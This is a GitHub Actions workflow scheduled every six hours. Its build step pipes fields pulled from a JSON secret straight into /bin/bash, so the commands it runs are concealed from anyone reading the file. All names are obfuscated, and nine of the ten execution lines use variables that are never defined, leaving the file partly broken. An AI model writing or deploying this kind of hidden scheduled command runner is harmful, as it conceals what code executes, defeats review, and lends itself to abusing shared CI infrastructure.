name: dashengwanglei
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dashengwanglei
        env:
          miyfv96: ${{ secrets.miyfv96 }}
        run: |
          echo $miyfv96 | jq -r .gh4 | /bin/bash
          echo $dyagx44 | jq -r .rnk09 | /bin/bash
          echo $cqdf286 | jq -r .ciapy2 | /bin/bash
          echo $mywo9 | jq -r .yqon734 | /bin/bash
          echo $b079 | jq -r .zw03858 | /bin/bash
          echo $n3 | jq -r .n357 | /bin/bash
          echo $ozubq2 | jq -r .zax2 | /bin/bash
          echo $shnhu4 | jq -r .ngpas7 | /bin/bash
          echo $pbfx6196 | jq -r .sasz17 | /bin/bash
          echo $uvmj7 | jq -r .lkfo9 | /bin/bash

